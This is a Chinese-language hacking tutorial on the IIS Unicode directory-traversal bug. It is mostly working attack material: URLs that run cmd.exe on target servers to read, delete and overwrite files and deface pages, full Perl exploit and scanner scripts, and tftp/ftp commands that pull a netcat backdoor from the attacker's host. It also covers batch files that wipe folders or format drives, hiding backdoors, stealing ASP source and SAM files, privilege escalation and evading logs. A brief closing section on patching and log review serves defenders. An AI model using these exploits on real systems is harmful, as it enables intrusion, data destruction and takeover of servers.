IIS UNICODE Bug

sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:＼ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "＼n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}
　　以上的pl程序你可以在本机运行（当然需要安装PERL），也可以在远程的
服务器上运行。
四． UNICODE编码漏洞简单利用的命令
　　一般情况下我们用http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir看到的目录是空的：（例如）
Directory of C:＼inetpub＼scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..
　　如果我们这样输入的话：http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼就可以看到该主机c:盘的目录和文件。
其它的一些简单的用法：
1、显示文件内容
　　如果想显示里面的其中一个badboy.txt文本文件，我们可以这样输入（htm,html，asp,bat等文件都是一样的）http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼badboy.txt
那么该文件的内容就可以通过IE显示出来。
2、建立文件夹的命令
　　http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy运行后我们可以看到
返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
英文意思是CGI错误
具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：
3、删除空的文件夹命令
　　http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy
返回信息同上
4、删除文件的命令
　　http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt
返回信息同上
5、copy文件且改名的命令
　　http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txt bad.txt
返回信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.
、显示目标主机当前的环境变量
　　http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=E:＼Documents and Settings＼All Users
AUTH_TYPE=Negotiate
AUTH_USER=BADBOYCL-DQQZQQ＼badboy
CASL_BASEDIR_ENV=E:＼scan＼CyberCop Scanner＼casl
CommonProgramFiles=E:＼Program Files＼Common Files
COMPUTERNAME=BADBOYCL-DQQZQQ
ComSpec=E:＼WINNT＼system32＼cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=127.0.0.1
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADA
AMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAY
QBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vz
SAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_I
7、把某个文件夹内的全部文件一次性COPY到另外的文件夹
　　http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy c:＼badboy c:＼inetpub＼wwwroot
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
　　我们查看c:＼inetpub＼wwwroot文件夹，结果所有c:＼badboy内的都拷贝到该目录里了
8、把某个文件夹剪贴到指定的目录
　　http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+move c:＼badboy c:＼inetpub＼wwwroot呵呵，还是可以做到的，时间的长短要看文件的多少了。
9、显示某一路径下相同文件类型的文件内容
　　http://127.0.0.1/scripts/..%c1%1c..＼winnt/system32/find.exe?/n+/v+""+c:＼inetpub＼wwwroot＼*.ht*
　　完全显示出来呀！同样，还有很多命令可以执行，大家可以试试，不过有些时间会很久，有些是不能执行的。解释+号，在这里+等于空格键，当然你也可以用空格键，用空格键运行后会转换为%20 和%c1%1c=/是同一道理的。对于名字超过8个字母的文件夹，如果我们想看里面的内容时就有点不同了比如说我们想看目标主机Program Files文件夹里面的内容时，应该这样输入
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼progra~1
　　这里就不能用+或者%20来代替program与files间的空格。
要看aa bb文件夹，方法就是以下http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:＼aabb~1
aa bb=aabb~1
　　如果同目录下还有aab b文件夹，就用这样的代码看aab b文件夹里的内容http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:＼aabb~2
依此类推。
五。如何简单地修改目标主机的web页面
　　一般情况下，我们要修改目标主机的web文件，常用到的方法是利用echo回显、管道工具。
　　这些命令和管道工具的功能如下：
D:＼>echo/?
显示信息，或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。
管道工具> >>的功能
"> >>" 是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中.
>>产生的内容将追加进文件中,>则将原文件内容覆盖。
再看看cmd/?里面的部分内容：
　　请注意，如果字符串有引号，可以接受用命令分隔符 '&&' 隔开的多个命令。并且，由于兼容原因，/X 与 /E:ON 相同，/Y 与/E:OFF 相同，并且 /R 与 /C 相同。忽略任何其它命令选项。
　　如果指定了 /C 或 /K，命令选项后的命令行其余部分将作为命令行处理；在这种情况下，会使用下列逻辑处理引号字符("):
1. 如果符合下列所有条件，那么在命令行上的引号字符将被保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符，特殊字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。
2. 否则，老办法是，看第一个字符是否是一个引号字符，如果是，舍去开头的字符并删除命令行上 的最后一个引号字符，保留最后一个引号字符之后的文字：
从以上可以得到什么启示？
　　我们知道IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符"&|(,;%<>"，如果发现有这些字符就会返回500错误，所以不能直接使用CMD.EEX加管道符等。
　　通过
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+badboy+> c:＼badboy.txt
　　我们可以看到提示　HTTP 500 - 内部服务器错误 Internet Explorer
　　经过反复测试，并从上面cmd内容的提示，我们可以会发现"引号字符是可以利用的，中联绿盟的yuange(袁哥)发布过关于这字符的公告，我想也许也是从上面的cmd/?信息中得到提示的，(纯属个人猜想，如果不是，请yuange不要见怪）。
　　我们要得到echo与>的结合使用，可以这样操作。
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+badboy+> c:＼badboy.txt
　　注意，与开始的命令的区别只在于cmd后面多了个"字符。运行后我们可以看到返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
　　英文意思是　CGI错误 具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：
　　实际上，我们已经把badboy写入到c:＼badboy.txt文件里了。
　　利用这样的方法我们可以建立.bat .txt .asp .htm .html 等文件，这对于一个存在这漏洞的网站可以说是致命打击的开始，尤其是能写.bat文件如果我们在autoexe.bat里面加入format del等命令时，你想结果会如何？？
　　回到修改网站页面的问题来。
　　比如说想修改c:＼inetpub＼wwwroot＼default.asp
　　我们就可以这样在地址栏输入：
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+your+site+has+unicode+bug+> c:＼inetpub＼wwwroot＼default.asp
　　那么再看他的首页时，已经被修改为
your site has unicode bug
　　事情就那么简单，任何一个普通人都可以通过地址栏对存在该漏洞的目标主机做最简单的HACK行为。
　　当然，如果为了方便输入，我们可以把cmd.exe改名为其他名字的文件，比如说c.exe
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼winnt＼system32＼cmd.exe+c:＼inetpub＼scripts＼c.exe
　　以后使用就可以直接
http://x.x.x.x/scripts/c.exe?/c+echo+badboy+> c:＼badboy.txt
六．网络里可得到的一些UNICODE扫描程序的分析
1、简单易用的red.exe
操作平台：win9x、NT4、WIN2K
　　该软件可以在一些中文黑客软件收藏库里找到下载。red.exe是中国大陆的一位HACK技术爱好者Redp0wer用C++编写的针对某一IP段的NT主机UNICODE编码漏洞的命令行式扫描工具，该工具扫描速度快，扫描准确。可以在本地和远程NT肉机上执行扫描工作，并产生一个简单的扫描报告RED.txt （仅记录所扫描的IP段的NT主机的IP地址）。该软件对目标NT主机scripts、IISADMPWD、msadc、cgi-bin、_vti_bin目录都做UNICODE编码漏洞的测试。
　　如果你仅能在本地机上对某个IP段进行扫描，且是固定IP地址的用户，在使用该软件时，你须注意你的扫描行为实际上也把你自己暴露给对方。且容易被对方抓住把柄状告你有入侵行为。我们可以从事件查看器里发现执行的足迹
应用程序日志c:＼WINNT＼system32＼config＼AppEvent.Evt
安全日志C:＼WINNT＼System32＼config＼SecEvent.Evt
系统日志C:＼WINNT＼system32＼config＼SysEvent.Evt
　　我们分析该软件的源码可以看到：GET /%s/%s/winnt/system32/cmd.exe?/c%scopy%s%s:＼＼winnt＼＼system32＼＼cmd.exe%s%s＼＼red.exe HTTP/1.0＼n＼n如果从安全扫描工具来说，是不应该对所扫描的目标主机做任何文件的增加和修改。所以，在你还不知道怎么消除你的足迹和利用肉机来执行扫描时，最好不要利用这软件作为你的扫描工具。
2、比较全面的UNICODE工具Uni2.pl
　　只要支持PERL，就可以利用这工具来对目标主机进行UNICODE编码漏洞的扫描。该程序可以对所有存在UNICODE编码漏洞的NT版本进行扫描测试。以下为该软件的源程序，具体如何操作就不做详细解说了
#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK
Example: ./uni.pl www.target.com:80＼n";}
#($host,$port)=split(/:/,@ARGV[0]);
($host = @ARGV[0]);
$port = 80;
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 2
my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 3
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 4
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 5
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 6
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 7
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 8
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 9
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 10
my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 11
my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 12
my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 13
my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}}
# ---------------test method 14
my @results=sendraw("GET /msadc/..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../winnt/system32/cmd.exe＼?/c＼+dir HTTP/1.0＼r＼n＼r＼n
");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../winnt/system32/cmd.exe＼?/c＼+dir＼n";}}
if ($flag!=1) {
print "$host: Not vulnerable＼n";
exit;
}
sub sendraw {
$hbn = gethostbyname($host);
if ($hbn) {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems＼n");
if(connect(S,pack "SnA4x8",2,$port,$target)) {
my @in;
select(S);
$|=1;
print $pstr;
while(){
push @in, $_;
}
select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect＼n";
exit;
}
} else {
print "$host: Host not found＼n";
exit;
}
}
3、攻击型NIT_UNICODE软件套装
下载地址http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip
压缩包里含有以下文件：
uni.pl -------扫描UNICODE编码漏洞的主PERL程序
uniexe.pl -----执行TFTP过程的PERL程序
ncx99.exe -----一个把telnet端口设置在99的netcat木马
tftpd32.exe -----TFTP设置软件
tftpd32.hlp -----帮助文件
flie_id.diz
vendinfo.diz
readme.file -----使用说明和例子
　　该程序包主要利用unicode编码漏洞，把ncx99.exe上传到目标主机，并启动，使攻击者可以通过telnet 目标主机的99端口，登陆到目标主机上进行攻击行为。
　　以下程序在使用时需要修改一些东西，找到$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:＼＼inetpub＼＼scripts＼＼nit.exe"; 这句，把xxx.xxx.xxx.xxx.xxx修改为你的IP地址，然后存盘。这句主要是把NCX99.EXE从你的主机改名传到目标主机c:＼inetpub＼scripts＼去。另外还需要根据目标主机的NT版本，对程序里的..%c0%af..做相应的修改，比如说目标主机是WIN2K就修改为..%c1%1c..
#!/usr/bin/perl
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
use Socket;
if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command＼n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n＼cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:＼＼inetpub＼＼scripts＼＼nit.exe";
$command=~s/ /＼%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "＼n
Hit CTRL-C if this is Hanging";
$command=~s/ /＼%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems＼n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...＼n"); }
}
# NIT IN THE YEAR 2000
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n＼cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:＼＼inetpub＼＼scripts＼＼nit.exe";
$command=~s/ /＼%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "＼n
Hit CTRL-C if this is Hanging";
$command=~s/ /＼%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0＼r＼n＼r＼n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems＼n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...＼n"); }

}
# NIT IN THE YEAR 2000
七．unicode编码漏洞提高篇
并不是说有UNICODE编码漏洞，以下的方法就能完全成功，主要给你一种思考的
方式，做到活学活用,举一反三,繁衍出更多更好的利用方法,提高对目标主机攻
击成功机率,使UNICODE编码漏洞的危害性让管理员们更加重视。
读懂MCD帮助里面的内容尤其是这方面的内容：
请注意，如果字符串有引号，可以接受用命令分隔符 '&&' 隔开
的多个命令。并且，由于兼容原因，/X 与 /E:ON 相同，/Y 与
/E:OFF 相同，并且 /R 与 /C 相同。忽略任何其它命令选项。
如果指定了 /C 或 /K，命令选项后的命令行其余部分将作为命令行处
理；在这种情况下，会使用下列逻辑处理引号字符("):
1. 如果符合下列所有条件，那么在命令行上的引号字符将被
保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符，特殊字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。
2. 否则，老办法是，看第一个字符是否是一个引号字符，如果
是，舍去开头的字符并删除命令行上 的最后一个引号字符，
保留最后一个引号字符之后的文字。
再熟悉一下利用ECHO写入法把一些特殊字符写到文本文件的转换格式
<等于%3C >等于%3E /等于%2F ＼等于%5C =等于%3D +等于%2B (等于%28
)等于%29 #等于%23 $等于%24 %等于%25 ^等于%5E &等于%26 "等于%22
|等于%7C ;等于%3B '等于%27 :等于%3A ?等于%3F ,等于%2C ~等于%7E
!等于%21
另外三个字符可以直接写入 - @ *
警告：
以下所有方法具有严重的危险性，主机管理人员可以通过以下方法检测自己主机
的安全性，了解该漏洞的严重后果；个人HACK爱好者请在本机测试。
由于实验而造成的一切后果和法律纠纷，由实验者自己承担。
1、bat命令法
很多文章都没有介绍如何在unicode编码漏洞中如何利用BAT命令，实际上运用
批处理，可以执行很多在地址栏里无法执行的命令，并且可以简化你输入的过程。
例子：
baddel.bat
del /f /s /q c:＼files＼*.*
rd c:＼files
我们可以这样建立和执行
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+del%20/f%20/s%20/q%20c:＼files＼*.*>baddel.bat
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rd%20c:＼files>>baddel.bat
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+baddel
结果C盘里的files目录和文件都被删除了。
如果我们把批处理改为format d:/q之类的话，那么D盘就被格式化了。
同样，你可以运用批处理进行更多的攻击，那你就需要好好复习DOS的命令及应用了。
注意：上面第三行的代码就是执行baddel.bat，这里.bat不要输入
2、attrib的运用
用这命令查文件属性和修改文件的属性。
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?c:＼inetpub＼wwwroot＼index.htm
运行后，我们可以看到index.htm的文件属性，往往有时我们无法修改这文件，是因为这文件设为只读。
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?%20%2br%20%2bh%20d:＼inetpub＼wwwroot＼index.htm
运行后，我们可以把index.htm文件设为只读、隐藏。如果我们把某个后门程序
隐藏起来，并且管理没有设置所有文件可见，那么是不是很方便上传的东西不
被管理员发现呢？
注意这里%2b等于+
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?%20-r%20-h%20d:＼inetpub＼wwwroot＼index.htm
运行后解除文件的属性。
3、ftp的运用
有时我们需要从一个你有权限的FTP主机把你想用到的一些文件上传到目标主机去，
象ncx99.exe之类的,当然你要把这些文件放在你的空间先。
……/cmd.exe?/c+echo+open+*.*.*.*>badboy.txt
……/cmd.exe?/c+echo+user>>badboy.txt
……/cmd.exe?/c+echo+pass>>badboy.txt
……/cmd.exe?/c+echo+get+ncx99.exe>>badboy.txt
……/cmd.exe?/c+echo+bye>>badboy.txt
然后运行
……/cmd".exe?/c+ftp+-s:badboy.txt
……/cmd.exe?/c+del badboy.txt
完成以上内容后ncx99.exe已经在inetpub/scripts目录里了
剩下的就看你怎么用软件了
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:＼inetpub＼scripts＼n
4、TFTP运用
关于TFTP的运用我们在全攻略-5里面的工具介绍中介绍过，那工具可以在WIN9X
或者NT、WIN2K下执行，前提条件是需要你在本机上安装PERL服务器程序，这对
于一般的爱好者来说稍微有点困难。
实际上如果你是使用NT系统或者你拥有一台NT肉机的话，就可以使用WINNT＼SYSTEM32
下的TFTP.EXE这个软件了。
tftp/?
Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
帮助是英文的，自己翻译吧。
在UNICODE上的命令代码：
http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe
5、ASP相关问题
一般情况下，NT机器绝大多数都会使用到ASP写的WEB程序和SQL数据库。
大家都知道ASP代码的泄露意味着你辛辛苦苦写的ASP源码被人无偿获得，同时你的站点
也很容易遭到黑手。ASP代码泄露的漏洞很多种，同样，在UNICODE编码漏洞下，你的ASP
源码同样可以极易被人获取。
假设你的index.asp是一个很好的程序，那么，入侵者可以通过type命令查看你的文件。
../cmd.exe?/type c:＼inetpub＼wwwroot＼index.asp
或者通过copy命令
../cmd.exe?/copy c:＼inetpub＼wwwroot＼index.asp c:＼inetpub＼wwwroot＼index.txt
然后直接下载你的源码，通过分析，找到你的数据库文件。
如果你是使用SQL服务来做数据库的，同样，入侵者可以通过查看你的ASP和global.asa
源码，通过分析，找到你的用户名和密码，然后通过SQL远程管理客户端进行攻击。
那么，你的商业秘密和网站的资料，还有什么安全可言呢？
入侵者还可以在你的主机里上传一个ASP后门程序（ASE，应该听说过和用过吧）并隐藏
起来，即使你以后补掉了UNICODE漏洞，入侵仍可在他的ASP后门程序在你未发现之前，
查看、修改、删除你主机上的WEB文件。
6、获得超级用户权限
可以通过下在你的SAM文件，利用一些黑客软件（如l0phtcrack）暴力破解。
也可以利用前面介绍的上传方法把gasys.dll、cmd.exe和getadmin.exe到目标主机，
然后通过一些软件或者方法获得目标主机的计算机名，再利用getadmin.exe把
iuser_计算机 升级为Administrator
/scripts/getadmin.exe?IUSR_计算机名
那还有什么事不可以做呢？已经等于完全控制这台主机了。
八．Unicode的安全问题
1、unicode漏洞解决方案
简单解决方案：
限制网络用户访问和调用CMD的权限，
在SCRIPTS、MSADC目录没必要使用的情况下，删除该文件夹或者改名。
安装NT系统时不要使用默认WINNT路径，你可以改为badboy或者其他什么的文件夹。
当然最好的方法还是下载最著名的补丁公司m$提供的补丁。
该漏洞补丁随微软安全公告MS00-057一起发布
(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
可以从如下地址下载补丁:
IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q301625/default.asp
IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q301625/default.asp
2、检查是否被黑客利用unicode漏洞入侵
检查LOG日志
在winnt＼system32＼logfiles＼w3svc1＼目录里保留有web访问记录
如果曾经被人利用UNICODE漏洞访问过，我们可以在日志里看到类似的记录
13:46:07 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 401
13:46:07 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 200
如果有人曾经执行过COPY、del、echo、.bat等具有入侵行为命令时
13:47:37 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 401
13:47:37 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 502
在winnt/system32/logfiles＼msftp＼svc1目录里可以找到运行FTP的日志
如果有人执行过FTP命令，在日志文件里我可以看到类似的记录
13:59:25 127.0.0.1 [2]USER badboy 331
13:59:25 127.0.0.1 [2]PASS - 230
13:59:25 127.0.0.1 [2]sent /a.txt 226
13:59:25 127.0.0.1 [2]QUIT - 226 这里入侵爱好者请注意，你利用目标主机到某个站点FTP下载什么文件都是被记录
的，不要以为你删除文件、改文件名就可以逃脱你入侵的证据了。
我们不排除有可能入侵者使用代理服务器。
当然你知道自己被人利用UNICODE漏洞来入侵自己的主机，但在这些日志里你
无法找到记录，那你就更要注意了，因为你遇到的不是一般的小菜鸟了。
检查事件查看器里面的错误记录
我们也可以在管理工具的事件查看器里找到入侵者的足迹，比如在某个时段出现
比较多的警告信息。信息类似以下内容：
事件类型: 警告
事件来源: W3SVC
事件种类: 无
事件 ID: 100
日期: 2001-2-2
事件: 21:51:26
用户: N/A
计算机: CLUB-BUM1HOYJHJ
描述:
该服务器因为错误 登录失败: 未知的用户名或错误密码。 而无法登录至 Windows NT 帐号 'CLUB-BUM1HOYJHJ＼badboy'。此数据为错误码。
若要获取关于此消息的更多的信息，请访问 Microsoft 联机支持站点:http://www.microsoft.com/contentredirect.asp 。
数据:
0000: 2e 05 00 00 ....